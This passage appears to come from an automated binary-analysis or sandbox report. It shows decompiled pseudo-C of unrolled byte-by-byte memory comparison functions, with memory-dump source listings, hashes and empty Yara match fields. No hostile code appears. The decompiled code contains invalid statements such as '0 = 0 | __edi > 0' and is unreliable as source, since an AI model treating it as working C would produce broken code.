                                        											if(_t297 == 0) {
                                        												L83:
                                        												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
                                        												if(_t299 == 0) {
                                        													L3:
                                        													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
                                        													if(_t246 != 0) {
                                        														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                        													}
                                        													goto L1;
                                        												}
                                        												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
                                        												if(_t246 != 0) {
                                        													goto L1;
                                        												} else {
                                        													goto L3;
                                        												}
                                        											}
                                        											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
                                        											if(_t246 != 0) {
                                        												goto L1;
                                        											}
                                        											goto L83;
                                        										}
                                        										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
                                        										if(_t301 == 0) {
                                        											L73:
                                        											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
                                        											if(_t303 == 0) {
                                        												L75:
                                        												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
                                        												if(_t305 == 0) {
                                        													L77:
                                        													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
                                        													if(_t246 != 0) {
                                        														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                        													}
                                        													goto L80;
                                        												}
                                        												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
                                        												if(_t246 != 0) {
                                        													goto L1;
                                        												}
                                        												goto L77;
                                        											}
                                        											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
                                        											if(_t246 != 0) {
                                        												goto L1;
                                        											}
                                        											goto L75;
                                        										}
                                        										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
                                        										if(_t246 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L73;
                                        									}
                                        									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
                                        									if(_t307 == 0) {
                                        										L62:
                                        										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
                                        										if(_t309 == 0) {
                                        											L64:
                                        											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
                                        											if(_t311 == 0) {
                                        												L66:
                                        												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
                                        												if(_t246 != 0) {
                                        													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                        												}
                                        												goto L69;
                                        											}
                                        											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
                                        											if(_t246 != 0) {
                                        												goto L1;
                                        											}
                                        											goto L66;
                                        										}
                                        										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
                                        										if(_t246 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L64;
                                        									}
                                        									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
                                        									if(_t246 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L62;
                                        								}
                                        								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
                                        								if(_t313 == 0) {
                                        									L51:
                                        									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
                                        									if(_t315 == 0) {
                                        										L53:
                                        										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
                                        										if(_t317 == 0) {
                                        											L55:
                                        											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
                                        											if(_t246 != 0) {
                                        												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                        											}
                                        											goto L58;
                                        										}
                                        										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
                                        										if(_t246 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L55;
                                        									}
                                        									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
                                        									if(_t246 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L53;
                                        								}
                                        								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
                                        								if(_t246 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L51;
                                        							}
                                        							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
                                        							if(_t319 == 0) {
                                        								L40:
                                        								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
                                        								if(_t321 == 0) {
                                        									L42:
                                        									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
                                        									if(_t323 == 0) {
                                        										L44:
                                        										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
                                        										if(_t246 != 0) {
                                        											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                        										}
                                        										goto L47;
                                        									}
                                        									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
                                        									if(_t246 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L44;
                                        								}
                                        								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
                                        								if(_t246 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L42;
                                        							}
                                        							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
                                        							if(_t246 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L40;
                                        						}
                                        						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
                                        						if(_t325 == 0) {
                                        							L29:
                                        							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
                                        							if(_t327 == 0) {
                                        								L31:
                                        								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
                                        								if(_t329 == 0) {
                                        									L33:
                                        									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
                                        									if(_t246 != 0) {
                                        										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                        									}
                                        									goto L36;
                                        								}
                                        								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
                                        								if(_t246 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L33;
                                        							}
                                        							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
                                        							if(_t246 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L31;
                                        						}
                                        						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
                                        						if(_t246 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L29;
                                        					}
                                        					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
                                        					if(_t331 == 0) {
                                        						L18:
                                        						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
                                        						if(_t333 == 0) {
                                        							L20:
                                        							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
                                        							if(_t335 == 0) {
                                        								L22:
                                        								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
                                        								if(_t246 != 0) {
                                        									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                        								}
                                        								goto L25;
                                        							}
                                        							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
                                        							if(_t246 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L22;
                                        						}
                                        						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
                                        						if(_t246 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L20;
                                        					}
                                        					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
                                        					if(_t246 != 0) {
                                        						goto L1;
                                        					}
                                        					goto L18;
                                        				} else {
                                        					__edi =  *(__esi - 0x1f) & 0x000000ff;
                                        					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
                                        					if(__edi == 0) {
                                        						L7:
                                        						__edi =  *(__esi - 0x1e) & 0x000000ff;
                                        						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                                        						if(__edi == 0) {
                                        							L9:
                                        							__edi =  *(__esi - 0x1d) & 0x000000ff;
                                        							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                        							if(__edi == 0) {
                                        								L11:
                                        								__ecx =  *(__esi - 0x1c) & 0x000000ff;
                                        								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                        								if(__ecx != 0) {
                                        									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                        								}
                                        								goto L14;
                                        							}
                                        							0 = 0 | __edi > 0x00000000;
                                        							__ecx = (__edi > 0) * 2 != 1;
                                        							if((__edi > 0) * 2 != 1) {
                                        								goto L1;
                                        							}
                                        							goto L11;
                                        						}
                                        						0 = 0 | __edi > 0x00000000;
                                        						__ecx = (__edi > 0) * 2 != 1;
                                        						if((__edi > 0) * 2 != 1) {
                                        							goto L1;
                                        						}
                                        						goto L9;
                                        					}
                                        					0 = 0 | __edi > 0x00000000;
                                        					__ecx = (__edi > 0) * 2 != 1;
                                        					if((__edi > 0) * 2 != 1) {
                                        						goto L1;
                                        					}
                                        					goto L7;
                                        				}
                                        				L1:
                                        				_t197 = _t246;
                                        				return _t197;
                                        			}

































                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                        • Instruction ID: be3ad18cb935d4c6894136cd4c1ce7f50391db08ed7bcf769d9b9b598d301080
                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                        • Instruction Fuzzy Hash: E5C166763051934AEFAE463E857443FBEE95A926B131A079DD8F2CF1D6FE20C124D620
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0106B4FE(void* __edx, void* __esi) {
                                        				signed int _t184;
                                        				signed char _t185;
                                        				signed char _t186;
                                        				signed char _t187;
                                        				signed char _t188;
                                        				signed char _t190;
                                        				signed int _t231;
                                        				void* _t275;
                                        				void* _t278;
                                        				void* _t280;
                                        				void* _t282;
                                        				void* _t284;
                                        				void* _t286;
                                        				void* _t288;
                                        				void* _t290;
                                        				void* _t292;
                                        				void* _t294;
                                        				void* _t296;
                                        				void* _t298;
                                        				void* _t300;
                                        				void* _t302;
                                        				void* _t304;
                                        				void* _t306;
                                        				void* _t308;
                                        				void* _t310;
                                        				void* _t312;
                                        				void* _t313;
                                        
                                        				_t313 = __esi;
                                        				_t275 = __edx;
                                        				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
                                        					_t231 = 0;
                                        					L11:
                                        					if(_t231 != 0) {
                                        						goto L1;
                                        					}
                                        					_t185 =  *(_t313 - 0x19);
                                        					if(_t185 ==  *(_t275 - 0x19)) {
                                        						_t231 = 0;
                                        						L22:
                                        						if(_t231 != 0) {
                                        							goto L1;
                                        						}
                                        						_t186 =  *(_t313 - 0x15);
                                        						if(_t186 ==  *(_t275 - 0x15)) {
                                        							_t231 = 0;
                                        							L33:
                                        							if(_t231 != 0) {
                                        								goto L1;
                                        							}
                                        							_t187 =  *(_t313 - 0x11);
                                        							if(_t187 ==  *(_t275 - 0x11)) {
                                        								_t231 = 0;
                                        								L44:
                                        								if(_t231 != 0) {
                                        									goto L1;
                                        								}
                                        								_t188 =  *(_t313 - 0xd);
                                        								if(_t188 ==  *(_t275 - 0xd)) {
                                        									_t231 = 0;
                                        									L55:
                                        									if(_t231 != 0) {
                                        										goto L1;
                                        									}
                                        									if( *(_t313 - 9) ==  *(_t275 - 9)) {
                                        										_t231 = 0;
                                        										L66:
                                        										if(_t231 != 0) {
                                        											goto L1;
                                        										}
                                        										_t190 =  *(_t313 - 5);
                                        										if(_t190 ==  *(_t275 - 5)) {
                                        											_t231 = 0;
                                        											L77:
                                        											if(_t231 == 0) {
                                        												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
                                        												if(_t231 != 0) {
                                        													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                        												}
                                        											}
                                        											goto L1;
                                        										}
                                        										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
                                        										if(_t278 == 0) {
                                        											L70:
                                        											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
                                        											if(_t280 == 0) {
                                        												L72:
                                        												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
                                        												if(_t282 == 0) {
                                        													L74:
                                        													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
                                        													if(_t231 != 0) {
                                        														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                        													}
                                        													goto L77;
                                        												}
                                        												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
                                        												if(_t231 != 0) {
                                        													goto L1;
                                        												}
                                        												goto L74;
                                        											}
                                        											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
                                        											if(_t231 != 0) {
                                        												goto L1;
                                        											}
                                        											goto L72;
                                        										}
                                        										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
                                        										if(_t231 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L70;
                                        									}
                                        									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
                                        									if(_t284 == 0) {
                                        										L59:
                                        										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
                                        										if(_t286 == 0) {
                                        											L61:
                                        											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
                                        											if(_t288 == 0) {
                                        												L63:
                                        												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
                                        												if(_t231 != 0) {
                                        													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                        												}
                                        												goto L66;
                                        											}
                                        											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
                                        											if(_t231 != 0) {
                                        												goto L1;
                                        											}
                                        											goto L63;
                                        										}
                                        										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
                                        										if(_t231 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L61;
                                        									}
                                        									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
                                        									if(_t231 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L59;
                                        								}
                                        								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
                                        								if(_t290 == 0) {
                                        									L48:
                                        									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
                                        									if(_t292 == 0) {
                                        										L50:
                                        										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
                                        										if(_t294 == 0) {
                                        											L52:
                                        											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
                                        											if(_t231 != 0) {
                                        												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                        											}
                                        											goto L55;
                                        										}
                                        										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
                                        										if(_t231 != 0) {
                                        											goto L1;
                                        										}
                                        										goto L52;
                                        									}
                                        									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
                                        									if(_t231 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L50;
                                        								}
                                        								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
                                        								if(_t231 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L48;
                                        							}
                                        							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
                                        							if(_t296 == 0) {
                                        								L37:
                                        								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
                                        								if(_t298 == 0) {
                                        									L39:
                                        									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
                                        									if(_t300 == 0) {
                                        										L41:
                                        										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
                                        										if(_t231 != 0) {
                                        											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                        										}
                                        										goto L44;
                                        									}
                                        									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
                                        									if(_t231 != 0) {
                                        										goto L1;
                                        									}
                                        									goto L41;
                                        								}
                                        								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
                                        								if(_t231 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L39;
                                        							}
                                        							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
                                        							if(_t231 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L37;
                                        						}
                                        						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
                                        						if(_t302 == 0) {
                                        							L26:
                                        							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
                                        							if(_t304 == 0) {
                                        								L28:
                                        								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
                                        								if(_t306 == 0) {
                                        									L30:
                                        									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
                                        									if(_t231 != 0) {
                                        										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                        									}
                                        									goto L33;
                                        								}
                                        								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
                                        								if(_t231 != 0) {
                                        									goto L1;
                                        								}
                                        								goto L30;
                                        							}
                                        							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
                                        							if(_t231 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L28;
                                        						}
                                        						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
                                        						if(_t231 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L26;
                                        					}
                                        					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
                                        					if(_t308 == 0) {
                                        						L15:
                                        						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
                                        						if(_t310 == 0) {
                                        							L17:
                                        							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
                                        							if(_t312 == 0) {
                                        								L19:
                                        								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
                                        								if(_t231 != 0) {
                                        									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                        								}
                                        								goto L22;
                                        							}
                                        							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
                                        							if(_t231 != 0) {
                                        								goto L1;
                                        							}
                                        							goto L19;
                                        						}
                                        						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
                                        						if(_t231 != 0) {
                                        							goto L1;
                                        						}
                                        						goto L17;
                                        					}
                                        					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
                                        					if(_t231 != 0) {
                                        						goto L1;
                                        					}
                                        					goto L15;
                                        				} else {
                                        					__edi = __al & 0x000000ff;
                                        					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                        					if(__edi == 0) {
                                        						L4:
                                        						__edi =  *(__esi - 0x1c) & 0x000000ff;
                                        						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                        						if(__edi == 0) {
                                        							L6:
                                        							__edi =  *(__esi - 0x1b) & 0x000000ff;
                                        							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                                        							if(__edi == 0) {
                                        								L8:
                                        								__ecx =  *(__esi - 0x1a) & 0x000000ff;
                                        								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
                                        								if(__ecx != 0) {
                                        									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                        								}
                                        								goto L11;
                                        							}
                                        							0 = 0 | __edi > 0x00000000;
                                        							__ecx = (__edi > 0) * 2 != 1;
                                        							if((__edi > 0) * 2 != 1) {
                                        								goto L1;
                                        							}
                                        							goto L8;
                                        						}
                                        						0 = 0 | __edi > 0x00000000;
                                        						__ecx = (__edi > 0) * 2 != 1;
                                        						if((__edi > 0) * 2 != 1) {
                                        							goto L1;
                                        						}
                                        						goto L6;
                                        					}
                                        					0 = 0 | __edi > 0x00000000;
                                        					__ecx = (__edi > 0) * 2 != 1;
                                        					if((__edi > 0) * 2 != 1) {
                                        						goto L1;
                                        					}
                                        					goto L4;
                                        				}
                                        				L1:
                                        				_t184 = _t231;
                                        				return _t184;
                                        			}

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                        • Instruction ID: 7491511427b87e4c894d2d3563cc48f7f3bcb7d5862d7981a5b7aff3329496b9
                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                        • Instruction Fuzzy Hash: 06C176B23051930AEFAD463E857453FBEE95E916B131A07ADD8F2CB1D6FE24C124D620
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0106B0E6(void* __edx, void* __esi) {
                                        				signed char _t177;
                                        				void* _t178;
                                        				signed char _t179;
                                        				signed char _t180;
                                        				signed char _t181;
                                        				signed char _t183;
                                        				signed char _t184;
                                        				void* _t228;
                                        				void* _t278;
                                        				void* _t281;
                                        				void* _t283;
                                        				void* _t285;
                                        				void* _t287;
                                        				void* _t289;
                                        				void* _t291;
                                        				void* _t293;
                                        				void* _t295;
                                        				void* _t297;
                                        				void* _t299;
                                        				void* _t301;
                                        				void* _t303;
                                        				void* _t305;
                                        				void* _t307;
                                        				void* _t309;
                                        				void* _t311;
                                        				void* _t313;
                                        				void* _t315;
                                        				void* _t317;
                                        				void* _t319;
                                        				void* _t321;
                                        				void* _t322;
                                        
                                        				_t322 = __esi;
                                        				_t278 = __edx;
                                        				_t177 =  *(__esi - 0x1c);
                                        				if(_t177 ==  *(__edx - 0x1c)) {
                                        					_t228 = 0;
                                        					L10:
                                        					if(_t228 != 0) {
                                        						L78:
                                        						_t178 = _t228;
                                        						return _t178;
                                        					}
                                        					_t179 =  *(_t322 - 0x18);
                                        					if(_t179 ==  *(_t278 - 0x18)) {
                                        						_t228 = 0;
                                        						L21:
                                        						if(_t228 != 0) {
                                        							goto L78;
                                        						}
                                        						_t180 =  *(_t322 - 0x14);
                                        						if(_t180 ==  *(_t278 - 0x14)) {
                                        							_t228 = 0;
                                        							L32:
                                        							if(_t228 != 0) {
                                        								goto L78;
                                        							}
                                        							_t181 =  *(_t322 - 0x10);
                                        							if(_t181 ==  *(_t278 - 0x10)) {
                                        								_t228 = 0;
                                        								L43:
                                        								if(_t228 != 0) {
                                        									goto L78;
                                        								}
                                        								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
                                        									_t228 = 0;
                                        									L54:
                                        									if(_t228 != 0) {
                                        										goto L78;
                                        									}
                                        									_t183 =  *(_t322 - 8);
                                        									if(_t183 ==  *(_t278 - 8)) {
                                        										_t228 = 0;
                                        										L65:
                                        										if(_t228 != 0) {
                                        											goto L78;
                                        										}
                                        										_t184 =  *(_t322 - 4);
                                        										if(_t184 ==  *(_t278 - 4)) {
                                        											_t228 = 0;
                                        											L76:
                                        											if(_t228 == 0) {
                                        												_t228 = 0;
                                        											}
                                        											goto L78;
                                        										}
                                        										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
                                        										if(_t281 == 0) {
                                        											L69:
                                        											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
                                        											if(_t283 == 0) {
                                        												L71:
                                        												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
                                        												if(_t285 == 0) {
                                        													L73:
                                        													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
                                        													if(_t228 != 0) {
                                        														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                        													}
                                        													goto L76;
                                        												}
                                        												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
                                        												if(_t228 != 0) {
                                        													goto L78;
                                        												}
                                        												goto L73;
                                        											}
                                        											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
                                        											if(_t228 != 0) {
                                        												goto L78;
                                        											}
                                        											goto L71;
                                        										}
                                        										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
                                        										if(_t228 != 0) {
                                        											goto L78;
                                        										}
                                        										goto L69;
                                        									}
                                        									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
                                        									if(_t287 == 0) {
                                        										L58:
                                        										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
                                        										if(_t289 == 0) {
                                        											L60:
                                        											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
                                        											if(_t291 == 0) {
                                        												L62:
                                        												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
                                        												if(_t228 != 0) {
                                        													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                        												}
                                        												goto L65;
                                        											}
                                        											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
                                        											if(_t228 != 0) {
                                        												goto L78;
                                        											}
                                        											goto L62;
                                        										}
                                        										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
                                        										if(_t228 != 0) {
                                        											goto L78;
                                        										}
                                        										goto L60;
                                        									}
                                        									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
                                        									if(_t228 != 0) {
                                        										goto L78;
                                        									}
                                        									goto L58;
                                        								}
                                        								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
                                        								if(_t293 == 0) {
                                        									L47:
                                        									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
                                        									if(_t295 == 0) {
                                        										L49:
                                        										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
                                        										if(_t297 == 0) {
                                        											L51:
                                        											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
                                        											if(_t228 != 0) {
                                        												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                        											}
                                        											goto L54;
                                        										}
                                        										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
                                        										if(_t228 != 0) {
                                        											goto L78;
                                        										}
                                        										goto L51;
                                        									}
                                        									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
                                        									if(_t228 != 0) {
                                        										goto L78;
                                        									}
                                        									goto L49;
                                        								}
                                        								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
                                        								if(_t228 != 0) {
                                        									goto L78;
                                        								}
                                        								goto L47;
                                        							}
                                        							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
                                        							if(_t299 == 0) {
                                        								L36:
                                        								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
                                        								if(_t301 == 0) {
                                        									L38:
                                        									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
                                        									if(_t303 == 0) {
